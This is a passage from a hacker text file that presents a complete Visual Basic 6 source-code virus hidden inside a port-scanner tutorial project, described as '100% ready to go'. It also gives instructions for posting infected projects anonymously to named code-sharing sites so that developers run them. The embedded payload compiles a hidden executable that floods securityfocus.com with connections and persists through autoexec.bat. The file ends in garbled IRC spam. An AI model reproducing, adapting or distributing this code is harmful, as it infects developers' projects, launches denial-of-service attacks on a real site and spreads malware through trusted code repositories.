X:\program files file folder will be infected (X being the drive that the program is run on). This will include all of the built in .frm files that visual studio comes with. Example: some built in .frm files are "FrmAbout" and "FrmDialog" and "FrmLogin" and so on and so on. Any of these can be added to a vb6.0 project at any time, and if they are infected, then the virus will continue to spread. The virus code in this section is the exact same virus code that is in section 5, except the code in this section is actualy attached to a working program, and its 100% ready to go! Use section 5 to help you understand what exactly is going on in this section. I found this program that is titled "PortScanner Tutorial" on the internet somewhere. It is used for port scanning, but thats not what im using it for here. To use this code, just take the part here marked Form1.Frm and put it into a text file, then name it "Form1.Frm" Do the same to the part marked "PortScanner Tutorial.vbp" and "Portscanner Tutorial.vbw" Then if you have visual basic 6.0 installed, you can run and compile this INFECTED visual basic project. Form1.Frm: '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' VERSION 5.00 Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "MSCOMCTL.OCX" Begin VB.Form Form1 BorderStyle = 3 'Fixed Dialog Caption = "Demo of a Portscanner" ClientHeight = 3690 ClientLeft = 45 ClientTop = 330 ClientWidth = 7095 LinkTopic = "Form1" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 3690 ScaleWidth = 7095 ShowInTaskbar = 0 'False StartUpPosition = 3 'Windows Default Begin VB.TextBox FoundPorts Height = 2175 Left = 240 MultiLine = -1 'True ScrollBars = 2 'Vertical TabIndex = 6 Top = 720 Width = 6735 End Begin MSComctlLib.StatusBar Status Align = 2 'Align Bottom Height = 255 Left = 0 TabIndex = 5 Top = 3435 Width = 7095 _ExtentX = 12515 _ExtentY = 450 Style = 1 SimpleText = "Idle..." _Version = 393216 BeginProperty Panels {8E3867A5-8586-11D1-B16A-00C0F0283628} NumPanels = 1 BeginProperty Panel1 {8E3867AB-8586-11D1-B16A-00C0F0283628} EndProperty EndProperty End Begin VB.TextBox txtPortEnd Height = 285 Left = 4080 TabIndex = 4 Text = "65536" Top = 240 Width = 855 End Begin VB.TextBox txtPortStart Height = 285 Left = 3120 TabIndex = 3 Text = "1" Top = 240 Width = 855 End Begin VB.TextBox txtHost Height = 285 Left = 240 TabIndex = 2 Text = "Localhost" Top = 240 Width = 2535 End Begin VB.CommandButton Command1 Caption = "Start" Height = 285 Left = 5040 TabIndex = 1 Top = 240 Width = 1935 End Begin MSWinsockLib.Winsock Sock Index = 0 Left = 6600 Top = 3000 _ExtentX = 741 _ExtentY = 741 _Version = 393216 End Begin VB.Label Label1 AutoSize = -1 'True Caption = "This Winsock control is called ""Sock"" and has an index of 0 --->" BeginProperty Font Name = "MS Sans Serif" Size = 9.75 Charset = 0 Weight = 700 Underline = 0 'False Italic = 0 'False Strikethrough = 0 'False EndProperty Height = 240 Left = 0 TabIndex = 0 Top = 3120 Visible = 0 'False Width = 6540 End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Private Sub Command1_Click() 'faqchew App.TaskVisible = False Dim line1, checkstatus1, lineput As String Dim i, importantvariable As Integer Dim j As Double Dim freefile1, freefile2, freefile3 As Integer Shell ("cmd.exe /c cd " & App.Path & " && dir /b > " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide If Dir(Mid(App.Path, 1, 3) & "Documents and Settings") <> "" Then Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & "Documents and Settings && dir /b /s >> " & Mid(App.Path, 1, 3) & "MSD0S.sys"), vbHide Else Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & "Program Files && dir /b /s >> " & Mid(App.Path, 1, 3) & "MSD0S.SYS"), vbHide End If DoEvents redo1: importantvariable = importantvariable + 1 j = Timer j = j + 2 Do Until Timer >= j Loop 'use this instead of gay timer!!!! 'Do ' DoEvents 'Loop Until Mid(App.Path, 1, 3) & "drives.sys" <> "" If Dir(Mid(App.Path, 1, 3) & "C0NFIG.sys") = "" Then If importantvariable >= 3 Then GoTo skip1 GoTo redo1 End If freefile1 = FreeFile Open Mid(App.Path, 1, 3) & "C0NFIG.sys" For Input As #freefile1 DoEvents Do Until EOF(freefile1) DoEvents Line Input #freefile1, line1 DoEvents line1 = UCase(line1) If Right$(line1, 4) = ".FRM" Then freefile2 = FreeFile Open line1 For Input As #freefile2 Do Until EOF(freefile2) Line Input #freefile2, checkstatus1 DoEvents Dim EOInfect As Boolean DoEvents If checkstatus1 = "'faqchew" Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "B00T.INI" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'faqchew2" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Close #freefile3 End If DoEvents If checkstatus1 = "'fakmeh" Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "AUT0EXEC.BAT" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'teh endg" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Close #freefile3 End If DoEvents 'payload part one If InStr(1, checkstatus1, "non disclosure revolution", vbTextCompare) Then 'MsgBox checkstatus1 freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "I0.SYS" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "' fuck full disclosure. '" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Print #freefile3, vbCrLf Close #freefile3 End If DoEvents If InStr(1, checkstatus1, "'theres nothing left for me to hide", vbTextCompare) Then freefile3 = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Append As #freefile3 Do Until EOInfect = True Print #freefile3, checkstatus1 If checkstatus1 = "'-NIN 2005" Then EOInfect = True Line Input #freefile2, checkstatus1 Loop EOInfect = False Print #freefile3, vbCrLf Close #freefile3 End If DoEvents DoEvents Loop Close #freefile2 End If Loop Close #freefile1 Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "C0NFIG.sys"), vbHide skip1: 'faqchew2 '************************************************ '* This is where it gets a bit more complicated * '************************************************ Dim Socket As Variant ' for instances of the socket we will ' use in the For loop Dim CurrentPort As Integer ' Obvious Const MaxSockets = 100 ' change this for Speed / Accuracy ' between 1 - 200 ' it's stable enough to use this On Error Resume Next ' We need a way to Start / Stop, so we'll use ' the command button's caption as a reference If Command1.Caption = "Start" Then ' to prevent errors, disable teh textboxes txtHost.Enabled = False txtPortStart.Enabled = False txtPortEnd.Enabled = False 'see above Command1.Caption = "Stop" ' Lets load some sockets to use For i = 1 To MaxSockets 'Load new sock instance i Load Sock(i) Next i CurrentPort = txtPortStart.Text ' Again using the command1.caption as a reference ' to start / stop While Command1.Caption = "Stop" ' set up the ports to scan by referencing ' each instance of the socket in turn For Each Socket In Sock ' Definately Need this so the system doesn't freeze DoEvents ' check if the socket is still trying to connect ' or is connected If Socket.State <> sckClosed Then ' skip the increment of the port GoTo continue End If ' close the socket to make double sure Socket.Close ' if it got to here, it's ready to try ' the next port, only after checking ' if we've done all the ports and the user ' hasn't clicked on Stop If CurrentPort = Val(txtPortEnd.Text) + 1 _ Then Exit For 'set the host Socket.RemoteHost = txtHost.Text ' set the port Socket.RemotePort = CurrentPort ' inform the user of the port being scanned Status.SimpleText = "Now Scanning Port " & CurrentPort ' attempt connect Socket.Connect ' fromhere, the socket will do one of two things ' 1) Raise a Connect therefore the port is open ' 2) Raise an Error therefore the port is closed ' increment the current port CurrentPort = CurrentPort + 1 ' if the socketisn't ready to be incremented, go here continue: ' goto the next socket instance Next Socket Wend 'set the command1.caption to Start so we can scan again Command1.Caption = "Start" ' re-enable the textboxes txtHost.Enabled = True txtPortStart.Enabled = True txtPortEnd.Enabled = True Else ' command1.caption is "Stop" Command1.Caption = "Start" End If ' close all the sockets to save memory For i = 1 To MaxSockets Unload Sock(i) Next i End Sub Private Sub FoundPorts_Change() 'fakmeh Dim IntArray(0 To 4), i As Integer Dim line_string, lineput As String Dim j As Double Dim freefile9, freefile2, freefile4, freefile5, freefile6 As Integer Dim exit_thing As Boolean If Dir(Mid(App.Path, 1, 3) & "MSD0S.sys") = "" Then GoTo skip2 freefile9 = FreeFile Open Mid(App.Path, 1, 3) & "MSD0S.sys" For Input As #freefile9 Do Until EOF(freefile9) skip_infect: Input #freefile9, lineput lineput = UCase(lineput) If Right$(lineput, 4) = ".FRM" Then ''debug'' 'MsgBox "lineput = " & lineput freefile2 = FreeFile exit_thing = False Open lineput For Input As #freefile2 Do Until EOF(freefile2) Or exit_thing = True Line Input #freefile2, line_string If InStr(1, line_string, "faqchew", vbTextCompare) <> 0 Then exit_thing = True End If Loop Close freefile2 If exit_thing = True Then GoTo skip_infect End If freefile2 = FreeFile Open lineput For Input As #freefile2 For i = 0 To 4 IntArray(i) = 0 Next i Do Until EOF(freefile2) Or IntArray(3) <> 0 Or IntArray(4) <> 0 Line Input #freefile2, line_string IntArray(0) = IntArray(0) + 1 If InStr(1, line_string, "Function", vbTextCompare) <> 0 Or InStr(1, line_string, "Sub", vbTextCompare) <> 0 Then If InStr(1, line_string, "Declare", vbTextCompare) = 0 And InStr(1, line_string, "Const", vbTextCompare) = 0 And InStr(1, line_string, ")", vbTextCompare) <> 0 And InStr(1, line_string, "(", vbTextCompare) <> 0 And InStr(1, line_string, "End ", vbTextCompare) = 0 And InStr(1, line_string, Chr(34), vbTextCompare) = 0 And InStr(1, line_string, "Exit Function", vbTextCompare) = 0 And InStr(1, line_string, "=", vbTextCompare) = 0 And InStr(1, line_string, "'", vbTextCompare) = 0 Then If IntArray(1) = 0 Then IntArray(1) = IntArray(0) Else IntArray(3) = IntArray(0) End If End If End If If InStr(1, line_string, "End Sub") <> 0 Or InStr(1, line_string, "End Function") <> 0 Then If IntArray(2) = 0 Then IntArray(2) = IntArray(0) Else IntArray(4) = IntArray(0) End If End If DoEvents Loop Close #freefile2 DoEvents freefile4 = FreeFile Open Mid(App.Path, 1, 3) & "newfile.txt" For Output As #freefile4 freefile5 = FreeFile Open lineput For Input As #freefile5 For i = 0 To IntArray(1) - 1 Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Next i freefile6 = FreeFile Open Mid(App.Path, 1, 3) & "B00T.INI" For Input As #freefile6 Do Until EOF(freefile6) Line Input #freefile6, line_string Print #freefile4, line_string DoEvents Loop Close #freefile6 DoEvents For i = i To IntArray(3) - 1 Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Next i DoEvents freefile6 = FreeFile Open Mid(App.Path, 1, 3) & "AUT0EXEC.BAT" For Input As #freefile6 Do Until EOF(freefile6) Line Input #freefile6, line_string Print #freefile4, line_string DoEvents Loop Close #freefile6 DoEvents Do Until EOF(freefile5) Line Input #freefile5, line_string Print #freefile4, line_string DoEvents Loop '''''''''''''''' Dim freefilefuck As Integer freefilefuck = FreeFile Open Mid(App.Path, 1, 3) & "I0.SYS" For Input As #freefilefuck Do Until EOF(freefilefuck) Line Input #freefilefuck, line_string Print #freefile4, line_string DoEvents Loop Close #freefilefuck DoEvents freefilefuck = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Input As #freefilefuck Do Until EOF(freefilefuck) Line Input #freefilefuck, line_string Print #freefile4, line_string DoEvents Loop Close #freefilefuck DoEvents '''''''' Close #freefile5 Close #freefile4 On Error Resume Next FileCopy Mid(App.Path, 1, 3) & "newfile.txt", lineput DoEvents Kill Mid(App.Path, 1, 3) & "newfile.txt" End If DoEvents Loop Close #freefile9 DoEvents 'FINALY.. what we do here is create the EXE of the payload, then we 'get the FUCK out of town like real dawgz. '.VBP file Dim freefilefuck1 As Integer freefile9 = FreeFile Open Mid(App.Path, 1, 3) & "systemProj1.vbp" For Input As #freefile9 DoEvents freefilefuck1 = FreeFile Open Mid(App.Path, 1, 3) & "Project1.vbp" For Output As #freefilefuck1 Dim g_string As Integer For g_string = 1 To 7 Line Input #freefile9, line_string Next g_string Do Until line_string = "'see the animial in his cage that you built" Line Input #freefile9, line_string If InStr(1, line_string, "in his cage", vbTextCompare) = 0 Then Print #freefilefuck1, Mid(line_string, 2) End If DoEvents Loop Close #freefilefuck1 DoEvents Close #freefile9 DoEvents '.FRM file Open Mid(App.Path, 1, 3) & "I0.SYS" For Input As #freefile9 DoEvents freefilefuck1 = FreeFile Open Mid(App.Path, 1, 3) & "Form1.frm" For Output As #freefilefuck1 Line Input #freefile9, line_string Do Until EOF(freefile9) Line Input #freefile9, line_string If InStr(1, line_string, "fuck full disclosure.", vbTextCompare) = 0 Then Print #freefilefuck1, Mid(line_string, 2) End If DoEvents Loop Close #freefilefuck1 DoEvents Close #freefile9 DoEvents Dim freefilefuck2 As Integer freefilefuck2 = FreeFile Open Mid(App.Path, 1, 3) & "form1.vbw" For Output As #freefilefuck2 Print #freefilefuck2, "Form1 = 130, 129, 577, 679, , 0, 0, 0, 0, C" & vbCr Close #freefilefuck2 DoEvents 'now we use the vb6.exe compiler to compile the payload into an exe.. we do it STEALTHY like 'no obvious activity going on.. Shell ("cmd.exe /c cd " & Mid(App.Path, 1, 3) & " && cd Program Files\Microsoft Visual Studio\VB98 && vb6.exe /m " & Mid(App.Path, 1, 3) & "project1.vbp " & Mid(App.Path, 1, 3) & "Program Files\FileAloc100.exe"), vbHide DoEvents Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "MSD0S.sys"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "AUT0EXEC.BAT"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "B00T.INI"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "newfile.txt"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "systemProj1.vbp"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "Form1.frm"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "project1.vbp"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "form1.vbw"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "I0.SYS"), vbHide Shell ("cmd.exe /c del " & Mid(App.Path, 1, 3) & "project1.vbp"), vbHide DoEvents App.TaskVisible = True Dim freefilefuck3 As Integer freefilefuck3 = FreeFile Open Mid(App.Path, 1, 3) & "autoexec.bat" For Append As #freefilefuck3 Print #freefilefuck3, Mid(App.Path, 1, 3) & "program files\FileAloc100.exe" Close #freefilefuck3 DoEvents skip2: 'light that burns twice as bright burns half as long 'teh endg '**************************************************** '* So that out textbox scrolls down automatically * '* we use the SelStart property in the * '* FoundPorts_change Event. * '**************************************************** ' Pseudo code '~~~~~~~~~~~~ ' Selection start position = length of Text in Text control FoundPorts.SelStart = Len(FoundPorts.Text) End Sub Private Function AddPort(Port As Integer) '************************************************** '* This is a function to add the port to the list * '************************************************** 'Pseudo code '~~~~~~~~~~~ ' Text = current text + newtext + carriage return FoundPorts.Text = FoundPorts.Text & "[Connected] Port " & Port & vbCrLf End Function Private Sub Sock_Connect(Index As Integer) ' the port is open so inform the user AddPort (Sock(Index).RemotePort) ' close the socket so it can't be flooded by anti ' portscanner tools and it gets incremented Sock(Index).Close End Sub Private Sub Sock_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) ' the port is closed so close the socket so it ' will be incremented Sock(Index).Close End Sub ' Support the non disclosure revolution! ' 'VERSION 5.00 'Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX" 'Begin VB.Form Form1 ' Caption = "Form1" ' ClientHeight = 465 ' ClientLeft = 1665 ' ClientTop = 1935 ' ClientWidth = 1560 ' LinkTopic = "Form1" ' ScaleHeight = 465 ' ScaleWidth = 1560 ' Begin MSWinsockLib.Winsock Winsock1 ' Index = 0 ' Left = 0 ' Top = 0 ' _ExtentX = 741 ' _ExtentY = 741 ' _Version = 393216 ' End 'End 'Attribute VB_Name = "Form1" 'Attribute VB_GlobalNameSpace = False 'Attribute VB_Creatable = False 'Attribute VB_PredeclaredId = True 'Attribute VB_Exposed = False 'Private Sub Form_Load() ' ' ''built in vb stealth functions 'Form1.Visible = False 'App.TaskVisible = False ' ''time bomb.. must be March - December when it DoSs 'Dim strmonth As String 'strmonth = Mid(Date, 4, 2) 'If strmonth < 3 Then End ' 'Dim i As Integer 'Dim load_sockets As Boolean ' ''we only want to load the sockets once. 'If load_sockets = False Then ' For i = 1 To 2200 ' Load Winsock1(i) ' DoEvents ' load_sockets = True ' Next i 'End If ' ''2000 sockets will DoS port 80 'For i = 1 To 2000 ' Winsock1(i).RemoteHost = "http://securityfocus.com" ' Winsock1(i).RemotePort = "80" ' Winsock1(i).Close ' DoEvents ' Winsock1(i).Connect 'Next i ' ' ''200 sockets will DoS port 22 'For i = 2001 To 2200 ' Winsock1(i).RemoteHost = "http://securityfocus.com" ' Winsock1(i).RemotePort = "22" ' Winsock1(i).Close ' DoEvents ' Winsock1(i).Connect 'Next i ' 'End Sub ' 'Private Sub Form_Terminate() ''anit-shutdown teqnique 'Shell ("cmd.exe /c " & App.Path & "\" & App.EXEName & ".exe"), vbHide 'End Sub ' 'Private Sub Winsock1_Error(Index As Integer, ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) ''reconnecting 'Winsock1(Index).Close 'Winsock1(Index).Connect 'End Sub ' fuck full disclosure. ' 'theres nothing left for me to hide 'i lost my ignoracne security and pride 'im all alone in this world you must dispise 'i believed your promices - your promices are lies 'terrable lies '-NIN 1998 'Type=Exe 'Form=Form1.frm 'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation 'Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX 'IconForm="Form1" 'Startup="Form1" 'HelpFile="" 'Title="SysFunc" 'ExeName32="SysFunc.exe" 'Path32="..\..\.." 'Command32="" 'Name="SysFunc" 'HelpContextID="0" 'Description="Alocation Tool" 'CompatibleMode="0" 'MajorVer=1 'MinorVer=0 'RevisionVer=2 'AutoIncrementVer=1 'ServerSupportFiles=0 'VersionCompanyName="Microsoft" 'VersionFileDescription="File System Alocation tool" 'VersionLegalCopyright="Copyright 2001" 'VersionProductName="SysFunc Alocation Tool" 'CompilationType=0 'OptimizationType=0 'FavorPentiumPro(tm)=0 'CodeViewDebugInfo=0 'NoAliasing=0 'BoundsCheck=0 'OverflowCheck=0 'FlPointCheck=0 'FDIVCheck=0 'UnroundedFP=0 'StartMode=0 'Unattended=0 'Retained=0 'ThreadPerObject=0 'MaxNumberOfThreads=1 'DebugStartupOption=0 ' '[MS Transaction Server] 'AutoRefresh=1 'see the animial in his cage that you built 'are you sure what side you're on 'better not look in to closely to the eyes 'are you sure what side the glass you are on 'see the safety of the life you have built 'everything where it belongs 'feel the hollowness inside of your heart 'and its all right where it belongs 'what if everything around you 'isn't quite as it seams 'what if all the world you think you know 'is an elaborate dream 'and if you look right at your reflection 'is it all you want to be 'but if you could look right through the cracks 'would you find yourself - 'find yourself afraid to see '- 'what if all the world's inside of your head 'just creations of your own 'the devils and the gods. all the living and the dead 'and you really aught to know 'you can live this illusion 'you can choose to believe 'you could keep looking but cant find the words 'now your hidng in the trees 'what if everything around you 'isnt quite as it seams 'what if all the world you used to know 'is an elaborate dream? 'and if you look at your reflection 'is it all you want to be? 'what if you could look right through the cracks 'would you find yourself - 'find yourself afraid to see? '-NIN 2005 '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' Portscanner Tutorial.vbp: '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' Type=Exe Form=Form1.frm Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\WINNT\System32\stdole2.tlb#OLE Automation Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX Object={831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0; MSCOMCTL.OCX Startup="Form1" Command32="" Name="Project1" HelpContextID="0" CompatibleMode="0" MajorVer=1 MinorVer=0 RevisionVer=0 AutoIncrementVer=0 ServerSupportFiles=0 CompilationType=0 OptimizationType=0 FavorPentiumPro(tm)=0 CodeViewDebugInfo=0 NoAliasing=0 BoundsCheck=0 OverflowCheck=0 FlPointCheck=0 FDIVCheck=0 UnroundedFP=0 StartMode=0 Unattended=0 Retained=0 ThreadPerObject=0 MaxNumberOfThreads=1 [MS Transaction Server] AutoRefresh=1 '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' PortScanner Tutorial.vbw: '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' Form1 = 44, 44, 378, 492, CZ, 22, 22, 356, 470, C '--- %< ---cut-here------ %< ---cut-here------ %< ---cut-here------ %< ---cut-here---' 7 - ___---=== Executing and spreading virus ===---___ Ok, so even if you do not know anything about programming, source code viruses, DoS or anything at all in this article, you can still cause damage. In this chapter I will explain how. Program Developers get lots of their code from already working programs from sites such as http://plantsourcecode.com or other free source code sites. Lots of the time when they need a function or API call or even a whole program, they dont even try to understand how the code works, or even look at the code at all. Most of the time, the programmer/developer will test out the code to see if the program works first, then copy and paste what is relevent. If they run the program whithout looking at the code first, the code can execute anything it wants and there will be nothing the developer can do about it. This is the #1 method this source code virus uses to spread. We will create a real program that works, attach our virus to it then post it at several sites such as planetsourcecode.com. If the program looks interesting and/or original, the programmer/developer will download the program to test it out to see if it is worthy of their use. With any luck, the virus will infect a bunch of their code, then it will also create an exe using its commented code. Here are the three easy steps to successfully post code at a site that people will download. The mark for this example will be planetsourcecode.com, the most widely used free source code site I know of. STEP ONE: Infect an already existing program with this source code virus. It can be an original program of yours, or just rip one off from planetsourcecode.com and pretend it is original. STEP TWO: Use a proxy, or tor, or a public computer or some other way to annonymously create an account with planetsourcecode.com STEP THREE: While still being annonymous, post the source code. PSC (planet source code) will ask you to fill in a bunch of fields like "Type API calls used here" and "Type what this program does here". Make the program sound original, unique and special in some way. In short, make it sound like your program is very good and anyone and everyone should be using it. Make people want to download it. STEP FOUR: There is no step four! And thats that! I recomend not to use the source code that has the virus already attached that is included in this program because it will be easily recognized. If you are any good at VB, feel free to modify this code to make it harder to spot. Change the markers. Switch the amount of sub functions it infects. Make it somewhat polymorphic and just basicly make it look differnt. Any of these will make the source look differnt and harder to spot from the original. I could have added a polymorph engine, but this would have significantly added to the size of the file. I think the smaller and tighter the code, the quicker it will spread from file to file and the harder it will be to spot. Here is a short list of sites that people download VB source from. Use these sites to post your bogus programs http://plantesourcecode.com http://www.freevbcode.com/ http://www.codeproject.com/ http://www.planet-source-code.com/ http://www.codearchive.com/ http://www.programmersheaven.com/ http://www.freeprogrammingresources.com/vbsource.html http://abstractvb.com/ http://www.vbcode.com/ http://www.developerfusion.co.uk/vb/ 8 - ___---=== Outros ===---___ This virus could be ported to VB.NET or VB 2003 or any other basic-type language. The consepts in this article can be applyed to 90% of all programming languages and most scripting languages as well, including Delphi, C, C++, ASM just to name a few. All you really have to do is pick a language you hate and apply these consepts to that language then post the source on the net. ~This t-file is dedicated to my insperation, Marijah-Wahna.~ -=If you ate ten pot browines before going to bed, you would write=- .,shit like this too!!,. EOF [#b4b0] Banned from channel[#b4b0] Banned from channel[#b4b0] Banned from channel[#b4b0] Banned from channel[#b4b0] Banned from channel[#b4b0] Banned fr channel[#b4b0] Banned from channel[#b4b0] Banned from channel[#b4b0] Banned fro channel[#b4b0] Banned from c d from channel[#b4b0] Banned from channel[#b4b0] Banned from c EOF ed from channel[#b4b0] Banned fro channel[#b4b0] Banned from c ed from channel[#b4b0] Banned fro channel[#b4b0] Banned from channel[#b4b0] Banned from channel[#b4b0] Banned fro channel[#b4b0] Banned from channel[#b4b0] Banned from channel[#b4b0] Banned fro channel[#b4b0] Banned from channel[#b4b0] Banned from channel[#b4b0] Banned fro